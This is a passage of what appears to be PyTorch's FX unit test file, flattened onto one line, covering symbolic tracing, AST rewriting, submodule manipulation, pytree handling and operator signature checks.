torch.relu(x) + y x, y = torch.randn(3, 4), torch.randn(3, 4) self.checkGraphModule(foo, (x, y)) def test_trace_dict_int_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[int, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({42: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) traced_graph = MyTracer().trace(CallsModWithDict()) def test_trace_dict_proxy_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[torch.Tensor, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({x: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'): traced_graph = MyTracer().trace(CallsModWithDict()) def test_module_deepcopy_edit_nodes(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) traced1 = symbolic_trace(Foo()) copied = copy.deepcopy(traced1) for node in copied.graph.nodes: if node.target == torch.relu: node.target = torch.neg copied.recompile() traced1.recompile() x = torch.randn(15, 15) torch.testing.assert_allclose(traced1(x), torch.relu(x)) torch.testing.assert_allclose(copied(x), torch.neg(x)) def test_direct_param_use(self): class TransposeTest(torch.nn.Module): def __init__(self): super().__init__() self.b = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.b class Foo(torch.nn.Module): def __init__(self): super().__init__() self.a = TransposeTest() def forward(self, x): return self.a.b, self.a.b.t(), self.a.b.view(12) traced = torch.fx.symbolic_trace(Foo()) assert(all('constant' not in node.target for node in traced.graph.nodes)) def test_single_default_arg(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1): return y m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) def test_multiple_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1, z=2): return y + z m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) self.checkGraphModule(m, (3, 4)) def test_regular_and_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y=1): return x + y m = M() self.checkGraphModule(m, (2,)) self.checkGraphModule(m, (2, 3)) def test_string_literal_return(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self): return "foo" m = M() self.checkGraphModule(m, ()) def test_namedtuple_return_qualname(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return MyNamedTup(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), MyNamedTup(input, input)) def test_update_args_kwargs_yells_at_you(self): symtraced = symbolic_trace(SimpleTest()) node = next(iter(symtraced.graph.nodes)) with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'): node.__update_args_kwargs((), {}) def test_torchbind_class_attribute_in_fx(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping") class FooBar1234(torch.nn.Module): def __init__(self): super(FooBar1234, self).__init__() self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"]) def forward(self): return self.f.top() m = FooBar1234() self.checkGraphModule(m, ()) def test_torchbind_class_attribute_in_fx_tensor_arg(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping") class FooBar2341(torch.nn.Module): def __init__(self): super(FooBar2341, self).__init__() self.f = torch.classes._TorchScriptTesting._ReLUClass() def forward(self, x): return self.f.run(x) m = FooBar2341() traced = symbolic_trace(m) input = torch.randn(3, 4) self.assertEqual(traced(input), m(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_script_method_trace(self): class Scripted(torch.nn.Module): def forward(self, x): return torch.relu(x) class Holder(torch.nn.Module): def __init__(self): super().__init__() self.s = torch.jit.script(Scripted()) def forward(self, x): return self.s(x) h = Holder() traced = symbolic_trace(h) input = torch.randn(3, 4) self.assertEqual(traced(input), h(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_namedtuple_return_trace(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return Pair(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), Pair(input, input)) def test_return_type_exists(self): class ReturnTypeModule(torch.nn.Module): def other(self, x: List[str]) -> List[str]: return x def forward(self, x: List[str]) -> List[str]: return self.other(x) traced = symbolic_trace(ReturnTypeModule()) self.assertIn("-> typing_List[str]", traced._code) scripted = torch.jit.script(traced) self.assertIn("-> List[str]", scripted.code) def getitem_inner(self): class GetItemBase(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer('pe', torch.randn(8, 8)) class GetItem1(GetItemBase): def forward(self, x): return self.pe[:, :x.size(0)] class GetItem2(GetItemBase): def forward(self, x): return self.pe[x.size(0)] class GetItem3(GetItemBase): def forward(self, x): return self.pe[4] # fx creates `self._tensor_constant0` here self.checkGraphModule(GetItem1(), [torch.zeros(4)]) self.checkGraphModule(GetItem2(), [torch.zeros(4)]) self.checkGraphModule(GetItem3(), [torch.zeros(4)]) @unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1", "Will be checked in test_getitem_subproc") def test_getitem(self): self.getitem_inner() def test_getitem_subproc(self): # need to run this test in a subproc to work around: # https://github.com/pytorch/pytorch/issues/50710 proc = Process(target=run_getitem_target) proc.start() proc.join() self.assertEqual(proc.exitcode, 0) def test_user_friendly_call_provenance_with_function(self): def fn(x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(fn) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'fn.forward'"): scripted = torch.jit.script(traced) def test_user_friendly_call_provenance_with_module(self): class M(torch.nn.Module): def forward(self, x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(M()) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'M.forward'"): scripted = torch.jit.script(traced) def test_snake_case(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.activations = torch.nn.ModuleDict([ ["snake_case", torch.nn.ReLU()], ["PascalCase", torch.nn.LeakyReLU()], ["ALL_CAPS", torch.nn.PReLU()] ]) def forward(self, x): a = self.activations["snake_case"](x) b = self.activations["PascalCase"](x) c = self.activations["ALL_CAPS"](x) return a, b, c traced = symbolic_trace(M()) check = [ ("activations_snake_case", "activations.snake_case"), ("activations_pascal_case", "activations.PascalCase"), ("activations_all_caps", "activations.ALL_CAPS") ] i = 0 for node in traced.graph.nodes: if node.op == "placeholder" or node.op == "output": continue name = check[i][0] target = check[i][1] self.assertEqual(name, node.name) self.assertEqual(target, node.target) i += 1 self.assertEqual(i, 3) def test_no_mutation(self): from torch.fx.immutable_collections import immutable_list x = immutable_list([3, 4]) with self.assertRaisesRegex(NotImplementedError, "new_args"): x[0] = 4 def test_partial_trace(self): class Foo(torch.nn.Module): def forward(self, x, y): if y: return 2 * x else: return x mod = Foo() mod_true = symbolic_trace(mod, concrete_args={'y': True}) mod_false = symbolic_trace(mod, concrete_args={'y': False}) self.assertEqual(mod_true(3, True), 6) print(mod_true.code) assert(any([i.target == torch._assert for i in mod_true.graph.nodes])) with self.assertRaises(AssertionError): mod_true(3, False) self.assertEqual(mod_false(3, False), 3) with self.assertRaises(AssertionError): mod_false(3, True) def f_higher(a, f): return f(a) nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2}) self.assertEqual(nf(3, lambda x: x * 2), 6) def test_custom_traceback_raised_when_exception_source_is_graphmodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.W = torch.nn.Parameter(torch.randn(5)) def forward(self, x): return torch.dot(self.W, x) traced = torch.fx.symbolic_trace(M()) out = [n for n in traced.graph.nodes if n.op == "output"][-1] with traced.graph.inserting_before(out): relu_out = traced.graph.call_method(method_name='relu', args=(out.args[0],)) out.args = (relu_out,) traced.recompile() with self.capture_stderr() as captured: with self.assertRaises(TypeError): traced(5) self.assertRegex(captured[0], r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_custom_traceback_not_raised_when_exception_source_is_submodule(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.linear = torch.nn.Linear(3, 4) def forward(self, x): return self.linear(x) traced = torch.fx.symbolic_trace(M()) # Do not change this to `capture_stderr` or another context # manager without ensuring that the output is as expected try: traced(torch.rand(5, 5)) except RuntimeError: captured = traceback.format_exc() self.assertNotRegex(captured, r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_graph_module_replicate_for_dp(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) gm = torch.fx.symbolic_trace(Foo()) x = torch.randn(5, 3) out = gm(x) replica = gm._replicate_for_data_parallel() out_replica = replica(x) torch.testing.assert_allclose(out_replica, out) def test_ast_rewriter_rewrites_assert(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_rewrites_assert_with_message(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z, "msg" return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_throw_out_variant(self): def foo(x): y = torch.rand_like(x) torch.sigmoid(x, out=y) return y class MyTracer(torch.fx.Tracer): check_mutable_operations = True tracer = MyTracer() with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'): traced_graph = tracer.trace(foo) def test_ast_rewriter_reassigns_submodules(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.bn = torch.nn.BatchNorm2d(100) def forward(self, x: torch.Tensor): return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_ast_rewriter_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf2", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_profiler_ranges_side_effect(self): g = torch.fx.Graph() handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',)) g.call_function(torch.ops.profiler._record_function_exit, (handle,)) g.output(None) found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]) g.eliminate_dead_code() found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]) def test_ast_rewriter_wrapped_via_decorator(self): class F(torch.nn.Module): def forward(self, x): return wrapped_via_decorator(x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(F()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(traced).transform() self.assertIn("wrapped_via_decorator", transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_with_submodule", traced.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), traced(input)) def test_submodule_manipulation_API(self): class C(torch.nn.Module): def __init__(self): super(C, self).__init__() self.conv = torch.nn.Conv2d(16, 33, 3, stride=2) self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.conv(torch.cat([self.param, x])) class B(torch.nn.Module): def __init__(self): super(B, self).__init__() self.linear = torch.nn.Linear(100, 200) self.register_buffer("buf", torch.randn(2, 3)) self.net_c = C() def forward(self, x): return self.linear(torch.cat([self.buf, self.net_c(x)])) class A(torch.nn.Module): def __init__(self): super(A, self).__init__() self.net_b = B() self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.net_b(x) + self.param a = symbolic_trace(A()) a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2)) conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1] with a.graph.inserting_before(conv): with warnings.catch_warnings(record=True) as w: dropout = a.graph.call_module(module_name="net_b.net_c.dropout", args=conv.args) self.assertEqual(len(w), 0) conv.replace_all_uses_with(dropout) a.graph.erase_node(conv) a.recompile() def module_exists(gm: GraphModule, path: str) -> bool: return any(path == name for name, _ in gm.named_modules()) def parameter_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_parameters()) and any(path == name for name in gm.state_dict().keys())) def buffer_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_buffers()) and any(path == name for name in gm.state_dict().keys())) # Test that we added the "dropout" submodule self.assertTrue(module_exists(a, "net_b.net_c.dropout")) # Test `get_submodule` with an added submodule self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout")) # Test that the "conv" submodule is still there self.assertTrue(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with an original module self.assertIsNotNone(a.get_submodule("net_b.net_c.conv")) # Test that the "conv" node is NOT still there conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"] self.assertEqual(conv, []) a.delete_submodule("net_b.net_c.conv") # Test that the "conv" submodule is now gone self.assertFalse(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with a deleted submodule with self.assertRaisesRegex(AttributeError, "has no attribute " "`conv`"): self.assertIsNone(a.get_submodule("net_b.net_c.conv")) # Test `get_attr` warnings cat = [n for n in a.graph.nodes if n.target == torch.cat][-1] with a.graph.inserting_before(cat): with warnings.catch_warnings(record=True) as w: param = a.graph.get_attr(qualified_name="net_b.net_c.param") self.assertEqual(len(w), 0) with self.assertWarnsRegex(UserWarning, "Attempted to " "insert a get_attr Node with no " "underlying reference in the " "owning GraphModule"): bad_param = a.graph.get_attr(qualified_name="net_b.param") a.graph.erase_node(bad_param) cat.args = (*cat.args, param) a.recompile() a.graph.lint() # Test `get_parameter` a.get_parameter("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "is not an " "nn.Parameter"): a.get_parameter("net_b.buf") with self.assertRaisesRegex(AttributeError, "has no attribute " "`param`"): a.get_parameter("net_b.param") # Test `get_buffer` a.get_buffer("net_b.buf") with self.assertRaisesRegex(AttributeError, "is not a " "buffer"): a.get_buffer("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "has no attribute " "`buf`"): a.get_buffer("net_b.net_c.buf") # Test non-nested attributes a.get_submodule("") a.get_parameter("param") # Insert some unused submodules a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2)) a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100)) # Garbage collection a.delete_all_unused_submodules() # Test that all the unused submodules are gone self.assertFalse(module_exists(a, "net_b.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.rnn")) self.assertFalse(module_exists(a, "batch_norm_2d")) # Test that we didn't delete any unused Parameters or buffers self.assertTrue(parameter_exists(a, "net_b.net_c.param")) self.assertTrue(buffer_exists(a, "net_b.buf")) a.graph.lint() def test_tracing_graphmodules_as_leaf_submodules(self): class A(torch.nn.Module): def forward(self, t): return t + t class B(torch.nn.Module): def __init__(self): super(type(self), self).__init__() self.calling = False self.called = False def forward(self, t): if self.calling: return t - t else: return t + t def __call__(self, *args): self.called = True self.calling = True return super(type(self), self).__call__(*args) self.calling = False class M(torch.nn.Module): def __init__(self, a, b): super().__init__() self.a = a self.b = b def forward(self, t): x = self.a(t) y = self.b(t) return x + y class LeafTracer(Tracer): def is_leaf_module(self, module, name): return True class LeafTracerNotB(Tracer): def is_leaf_module(self, module, name): return False if "b" in name else True # Recompile calls added "for fun", since they # chain __call__ wrappers. # # Test: B as a regular, non-leaf module # a = symbolic_trace(A()) a.recompile() m = M(a, B()) graph = LeafTracerNotB().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is not treated as leaf. self.assertFalse(hasattr(gm, "b")) # Test assert custom __call__ on submodule b was honored. match = [ n for n in gm.graph.nodes if n.op == "call_function" and n.target == operator.sub ] self.assertTrue(len(match) == 1) # # Test: B as a regular, leaf module # symbolic_trace should only patch torch.nn.Module.__call__, # which means B.__call__ should still execute # a = symbolic_trace(A()) a.recompile() b = B() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is leaf: self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) # Test b.__call__ was run self.assertTrue(b.called) self.assertTrue(gm.get_submodule("b").called) # # Test: B as GraphModule leaf # __call__ not honored since symbolic_trace directly invokes forward() # a = symbolic_trace(A()) a.recompile() b = symbolic_trace(B()) b.recompile() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer("my_buff", torch.rand(3, 4)) self.register_parameter( "my_param", torch.nn.Parameter(torch.rand(3, 4)) ) def forward(self, x): return x + self.my_buff + self.my_param mod = MyModule() mod_traced = symbolic_trace(mod) # Create new GraphModule based on original, either w/ dict or root module. orig_buff = mod_traced.get_buffer("my_buff") orig_param = mod_traced.get_parameter("my_param") mod_traced_new = GraphModule( {"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod, mod_traced.graph, ) # Check that both my_buff and my_param are found and the same. try: new_buff = mod_traced_new.get_buffer("my_buff") except Exception: self.fail("Did not find my_buff") self.assertEqual(orig_buff, new_buff) try: new_param = mod_traced_new.get_parameter("my_param") except Exception: self.fail("Did not find my_param") self.assertEqual(orig_param, new_param) x = torch.rand(3, 4) orig_out = mod_traced(x) submodules_out = mod_traced_new(x) self.assertEqual(orig_out, submodules_out) def test_graph_module_init_buffer_param_copied_dict_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=True) def test_graph_module_init_buffer_param_copied_mod_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=False) def test_annotations_with_no_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: torch.Tensor, a: A) -> torch.Tensor: return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor': return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor: return a(x[0]) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_internal_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor': return a(x)[0] self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) @unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature " "`annotations` is not defined in Python <3.7") def test_annotation_with_future(self): try: import fx.test_future # noqa: F401 finally: del sys.modules["__future__"] def test_annotations_empty_tuple(self): class Foo(torch.nn.Module): def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]): return "foo" traced = torch.fx.symbolic_trace(Foo()) x = () y = ("bar", ()) traced(x, y) FileCheck().check("_Tuple[()]") \ .check("typing_Tuple[str,typing_Tuple[()]]") \ .run(traced.code) scripted = torch.jit.script(traced) scripted(x, y) FileCheck().check("Tuple[()]") \ .check("Tuple[str, Tuple[()]]") \ .run(scripted.code) @skipIfNoTorchVision def test_cpatcher(self): cnt = 0 def patched_impl(to_patch, args, kwargs): nonlocal cnt cnt += 1 return to_patch(*args, **kwargs) c_patch_enabled = True def patched_in(to_patch, args, kwargs): nonlocal c_patch_enabled try: c_patch_enabled = False r = patched_impl(to_patch, args, kwargs) finally: c_patch_enabled = True return r def trace_func(frame, action, arg): if action == 'c_call': if c_patch_enabled: torch._C._fx.patch_function(arg, patched_in) import torch rn = torchvision_models.resnet18() try: sys.setprofile(trace_func) rn(torch.rand(1, 3, 224, 224)) print("testing print patch") finally: sys.setprofile(None) assert(cnt != 0) def test_randn(self): def f(): return torch.randn(3, 3) fx_f = symbolic_trace(f, enable_cpatching=True) assert(any(i.target == torch.randn for i in fx_f.graph.nodes)) fx_f = symbolic_trace(f, enable_cpatching=False) assert(all(i.target != torch.randn for i in fx_f.graph.nodes)) fx_f = symbolic_trace(f, enable_cpatching=True) assert(any(i.target == torch.randn for i in fx_f.graph.nodes)) def test_pytree(self): def f_sum(x): return sum(x) def f_sum_dict(x): out = 0 for k, v in x.items(): out += v return out def f_dict_list_map(x): new_dict = {} for k, v in x.items(): new_dict[k] = [i + 1 for i in v] return new_dict def f_dict_add(x): return x['a'] + sum(x['z']) def f_namedtuple_add(x): return x.x + x.y pytree._register_pytree_node( Foo, lambda x: ([x.a, x.b], None), lambda x, _: Foo(x[0], x[1]), ) fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b]) def f_custom(x): return x.a + x.b def f_custom_dict(x): return f_sum_dict(x.a) + x.b def f_return_custom(x): return Foo(x.b, x.a) tests = [ (f_sum, [PH, PH, PH]), (f_sum, []), (f_sum_dict, {'a': PH, 'b': PH, 'c': PH}), (f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}), (f_dict_list_map, {5: (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': []}), (f_custom, Foo(PH, PH)), (f_custom, Foo(PH, 3)), (f_custom_dict, Foo({'a': PH, 'b': PH}, PH)), # (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees (f_namedtuple_add, Point(PH, PH)), ] def verify_pytree(f, inp): val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]]) orig_out = f(val) nf = symbolic_trace(f, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) nf = symbolic_trace(nf) self.assertEqual(nf(val), orig_out) assert "tree_flatten_spec" not in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1) nf = symbolic_trace(nf, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) pickled = pickle.dumps(nf) nf = pickle.loads(pickled) self.assertEqual(nf(val), orig_out) for f, inp in tests: verify_pytree(f, inp) def test_pytree_concrete(self): def f(b, a): if b: return a['a'] else: return a['z'] inp = {'a': {'a': PH, 'z': PH}, 'b': True} nf = symbolic_trace(f, concrete_args=inp) val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) self.assertEqual(nf(**val), f(**val)) nf = symbolic_trace(nf) self.assertEqual(nf(**val), f(**val)) def run_getitem_target(): from torch.fx._symbolic_trace import _wrapped_methods_to_patch _wrapped_methods_to_patch.append((torch.Tensor, "__getitem__")) try: TestFX().getitem_inner() finally: _wrapped_methods_to_patch.pop() class TestOperatorSignatures(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag @onlyCPU @ops(op_db, allowed_dtypes=(torch.float,)) def test_get_torch_func_signature_exhaustive(self, device, dtype, op): # Sorted and one entry on each line to minimize merge conflicts. known_no_schema = {'block_diag', 'broadcast_tensors', 'cdist', 'contiguous', 'dstack', 'einsum', 'expand', 'expand_as', 'fill_', 'hstack', 'igamma', 'igammac', 'linalg.multi_dot', 'lu', 'norm', 'polygamma', 'special.polygamma', 'repeat', 'reshape_as', 'resize_', 'resize_as_', 'special.zeta', 'stack', 'to_sparse', 'view', 'view_as', 'nn.functional.hardshrink', 'vstack', 'where', 'zero_', '__getitem__', '__radd__', '__rsub__', '__rmul__', '__rdiv__', '__rmod__', '__rpow__', '__rand__', '__ror__', '__rxor__', '__rmatmul__'} try: sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False) schemas = get_signature_for_torch_op(op.op) if not schemas: raise RuntimeError('No Schemas Returned') for sample_input in sample_inputs_itr: # Iterate through overloads until we hit a match. If we exit this # loop via `else`, we haven't found a match for schema in schemas: try: bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs) bound_args.apply_defaults() op(*bound_args.args, **bound_args.kwargs) break except TypeError as e: pass else: raise RuntimeError(f'Did not match any schemas for op {op.name}!') except Exception as e: assert op.name in known_no_schema or "nn.functional" in op.name class TestFXAPIBackwardCompatibility(JitTestCase): def setUp(self): self.maxDiff = None # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def _fn_to_stable_annotation_str(self, obj): """ Unfortunately we have to serialize function signatures manually since serialization for `inspect.Signature` objects is not stable across python versions """ fn_name = torch.typename(obj) signature = inspect.signature(obj) sig_str = f'{fn_name}{signature}' arg_strs = [] for k, v in signature.parameters.items(): maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\ if v.annotation is not inspect.Signature.empty else '' def default_val_str(val): if isinstance(val, (tuple, list)): str_pieces = ['(' if isinstance(val, tuple) else '['] str_pieces.append(', '.join(default_val_str(v) for v in val)) if isinstance(val, tuple) and len(str_pieces) == 2: str_pieces.append(',') str_pieces.append(')' if isinstance(val, tuple) else ']') return ''.join(str_pieces) # Need to fix up some default value strings. # First case: modules. Default module `repr` contains the FS path of the module. # Don't leak that if isinstance(val, types.ModuleType): return f'<module {val.__name__}>' # Second case: callables. Callables (such as lambdas) encode their address in # their string repr. 